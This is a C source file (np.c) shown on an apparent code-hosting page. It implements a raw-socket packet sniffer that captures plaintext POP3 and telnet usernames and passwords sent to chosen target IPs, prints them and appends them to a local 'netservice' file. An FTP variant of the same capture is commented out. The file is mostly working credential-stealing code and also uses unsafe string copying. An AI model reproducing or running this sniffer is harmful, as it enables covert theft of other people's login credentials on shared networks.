📄 np.c
字号:
{
int sock2;
struct ifreq ifr;
char *iface;
sock2 = Inet_OpenRawSock(iface);
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, iface, sizeof(ifr.ifr_name));
ifr.ifr_flags = old_ifr.ifr_flags;
if ( ioctl(sock2, SIOCSIFFLAGS, &ifr) < 0 ) // flag restoring
perror("ioctl(SIOCSIFFLAGS) | flag restoring");
close(sock2);
}
void docoderIp(packet * p,u_int8_t * pkt, int packte_len)
{
int ip_len;
p->iph=(IPHdr *)pkt;
// if(p->iph->ip_proto==0x06&&(p->iph->ip_dst.s_addr==inet_addr(scoutdest)
// ||p->iph->ip_src.s_addr==inet_addr(scoutdest)))
if(p->iph->ip_proto==0x06)
{
ip_len = ntohs(p->iph->ip_len);
decodertcp(p, pkt+(p->iph->ip_hlen<<2),ip_len-(p->iph->ip_hlen<<2));
getappinfo(*p);
}
return ;
}
void decodertcp(packet * p, u_int8_t * pkt_tcph,int len)
{
int hlen;
p->tcph=(TCPHdr *)pkt_tcph;
hlen= p->tcph->th_off<<2;
p->data = (u_int8_t *) (pkt_tcph + hlen);
if(hlen < len)
{
p->dsize = len - hlen;//- (p->iph->ip_hlen<<2);
}
else
{
p->dsize = 0;
}
return;
}
void getappinfo(packet p) //get the name and pass
{
int strlenth,j;
FILE *fto;
char * tempchar,* tempchar1;
u_int32_t dest_ip;
if((ntohs(p.tcph->th_dport)==23&&((p.tcph->th_flags&0x02)==2))||(ntohs(p.tcph->th_dport)==21
&&((p.tcph->th_flags&0x02)==2))||(ntohs(p.tcph->th_dport)==110&&((p.tcph->th_flags&0x02)==2)))
dest_ip = p.iph->ip_dst.s_addr;
for(j=0;j<i;j++)
{
if(dest_ip == inet_addr(ip[j]))
{
// App_Info app_info;
if(ntohs(p.tcph->th_dport)==23&&(p.tcph->th_flags&0x02)==2)
telnetuserflag=0,telnetpswflag=0;
if(p.dsize==0) return; //must condition p.dsize and p.data ( pointer problem)
// tempchar=(char *)p.data;
switch (ntohs(p.tcph->th_dport))
{
/*case 21:
if(memcmp(p.data,"user",4)==0||memcmp(p.data,"USER",4)==0)
{
tempchar=strstr((char *)p.data,"user");
if(tempchar==NULL) tempchar=strstr((char *)p.data,"USER");
if(tempchar==NULL) return ;
tempchar=tempchar+5;
tempchar1=strchr(tempchar,'\r');
strlenth=tempchar1-tempchar;
*(tempchar+strlenth)='\0';
printf("FTP USER=%s\n",tempchar);
strcpy(app_info.user_name,tempchar);
}
if(memcmp(p.data,"pass",4)==0||memcmp(p.data,"PASS",4)==0)
{
tempchar=strstr((char *)p.data,"pass");
if(tempchar==NULL) tempchar=strstr((char *)p.data,"PASS");
if(tempchar==NULL) return ;
tempchar=tempchar+5;
tempchar1=strchr(tempchar,'\r');
strlenth=tempchar1-tempchar;
*(tempchar+strlenth)='\0';
printf("FTP PSW=%s\n",tempchar);
strcpy(app_info.user_pass,tempchar);
fto=fopen("netservice","a");
//app_info.source_ip=p.iph->ip_src.s_addr;
//app_info.dest_ip=p.iph->ip_dst.s_addr;
//app_info.source_port=p.tcph->th_sport;
//app_info.dest_port=p.tcph->th_dport;
//app_info.hostIP=app_info.source_ip;
//app_info.app_type=ntohs(p.tcph->th_dport);
//writeappinfo(app_info);
fprintf(fto,"%s:%s;\n","IP",ip[j]);
fprintf(fto,"%s:%s;\n","ftp_user",app_info.user_name);
fprintf(fto,"%s:%s;\n\n","ftp_password",app_info.user_pass);
fclose(fto);
}
break;*/
case 110:
// case 1080:
if(memcmp(p.data,"USER",4)==0||memcmp(p.data,"user",4)==0)
{
tempchar=strstr((char *)p.data,"user");
if(tempchar==NULL) tempchar=strstr((char *)p.data,"USER");
if(tempchar==NULL) return ;
tempchar=tempchar+5;
tempchar1=strchr(tempchar,'\r');
strlenth=tempchar1-tempchar;
*(tempchar+strlenth)='\0';
strcpy(app_info.user_name,tempchar);
//printf("POP USER=%s\n",tempchar);
}
if(memcmp(p.data,"PASS",4)==0||memcmp(p.data,"pass",4)==0)
{
tempchar=strstr((char *)p.data,"pass");
if(tempchar==NULL) tempchar=strstr((char *)p.data,"PASS");
if(tempchar==NULL) return ;
tempchar=tempchar+5;
tempchar1=strchr(tempchar,'\r');
strlenth=tempchar1-tempchar;
*(tempchar+strlenth)='\0';
strcpy(app_info.user_pass,tempchar);
// app_info.source_ip=p.iph->ip_src.s_addr;
// app_info.dest_ip=p.iph->ip_dst.s_addr;
// app_info.source_port=p.tcph->th_sport;
// app_info.dest_port=p.tcph->th_dport;
// app_info.hostIP=app_info.source_ip;
// app_info.app_type=ntohs(p.tcph->th_dport);
//writeappinfo(app_info);
// printf("POP PSW=%s\n",tempchar);
// fto=fopen("netservice","a");
//fprintf(fto,"%s:%s;\n","IP",ip[j]);
//fprintf(fto,"%s:%s;\n","pop3_user",app_info.user_name);
//fprintf(fto,"%s:%s;\n\n","pop3_password",app_info.user_pass);
//fclose(fto);
}
break;
} //end swith
// if(telnetflag==0||telnetflag==1)
// {
if((ntohs(p.tcph->th_sport)==23||ntohs(p.tcph->th_sport)==1080)&&telnetuserflag==0&&p.dsize>0)
{ // printf("%s\n",p.data);
if(memicmp(p.data,"login:", p.dsize,6)!=NULL&&memicmp(p.data,"Last login:", p.dsize,11)==NULL)
{
telnetuserflag=1;
memset(telnetuser,0,50);
// printf("telnetflag=%d",telnetflag);
}
}
else if(telnetpswflag==2)
{
if(memicmp(p.data,"login:", p.dsize,6)!=NULL&&memicmp(p.data,"Last login:", p.dsize,11)==NULL)
{
telnetuserflag=1;
memset(telnetuser,0,50);
}
}
if(memicmp(p.data,"Password:", p.dsize,9)!=NULL&&telnetuserflag==2&&p.dsize>0)
{
memset(telnetpsw,0,50);
telnetpswflag=1;
}
if(telnetuserflag==1&&ntohs(p.tcph->th_dport)==23&&p.dsize>0)
{
if(*p.data!='\r'&&p.dsize==1)
{
strncat(telnetuser,p.data,1);
}
else if(*p.data=='\r')
{
printf("telnet USER=%s\n",telnetuser);
//memset(app_info.user_pass,0,128);
strcpy(app_info.user_name,telnetuser);
telnetuserflag=2;
}
}
if(telnetpswflag==1&&ntohs(p.tcph->th_dport)==23&&p.dsize>0)
{
if(*p.data!='\r'&&p.dsize==1)
{
strncat(telnetpsw,p.data,1);
}
else if(*p.data=='\r')
{
strcpy(app_info.user_pass,telnetpsw);
printf("telnet PASS=%s\n",telnetpsw);
telnetpswflag=2;
telnetuserflag=0;
// app_info.source_ip=p.iph->ip_src.s_addr;
//app_info.dest_ip=p.iph->ip_dst.s_addr;
// app_info.source_port=p.tcph->th_sport;
// app_info.dest_port=p.tcph->th_dport;
// app_info.hostIP=app_info.source_ip;
// app_info.app_type=ntohs(p.tcph->th_dport);
// writeappinfo(app_info);
fto=fopen("netservice","a");
fprintf(fto,"%s:%s;\n","IP",ip[j]);
fprintf(fto,"%s:%s;\n","telnet_user",app_info.user_name);
fprintf(fto,"%s:%s;\n\n","telnet_password",app_info.user_pass);
fclose(fto);
}
}
} //end if
//break;
}
}
//write aff_info fouction
//IN PARAMETER
//App_Info app_info application infomation
//OUT PARAMETER
//nothing
//RETURN void
void writeappinfo(App_Info app_info)
{
int fileno;//,i,j;
long fileheadinfolen;
long nowtime;
time(&nowtime);
app_info.App_timer=nowtime;
strcpy(appinfofilename,"appinfor.txt"); //应用服务信息文件名
fileno=open(appinfofilename,O_RDWR);//O_WRONLY);
memset(&fstruct,0,sizeof(fstruct));
if(fileno<0) //文件打开失败。
{
creat(appinfofilename,S_IRWXG);
fstruct.firstrecoffset=sizeof(fstruct);
strcpy(fstruct.infoname,appinfofilename);
fstruct.lastrecoffset=sizeof(fstruct);
fstruct.reclengch=sizeof(app_info);
fileno=open(appinfofilename,O_RDWR);//O_WRONLY);
write(fileno,&fstruct,sizeof(fstruct));
}
else
{
read(fileno,&fstruct,sizeof(fstruct));
}
fileheadinfolen=sizeof(fstruct); //文件信息长度
lseek(fileno,0,SEEK_END);
write(fileno,&app_info,sizeof(app_info));
fstruct.lastrecoffset=lseek(fileno,0,SEEK_END);
fstruct.totalrecnum+=1;
lseek(fileno,0,SEEK_SET);
write(fileno,&fstruct,sizeof(fstruct));
close(fileno);
}
//unsigned char * memicmp(unsigned char * d_str,unsigned char * s_str, int d_len,int s_len)
unsigned char * memicmp(unsigned char * d_str,unsigned char * s_str, int d_len,int s_len)
{
int i=0,j=0;
for(i=0;i<d_len;i++)
{
for(j=0;j<s_len;j++)
{
if (*(d_str+i+j)!=*(s_str+j)) break;
}
if(j==s_len) return d_str+i;
}
return NULL; //false
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -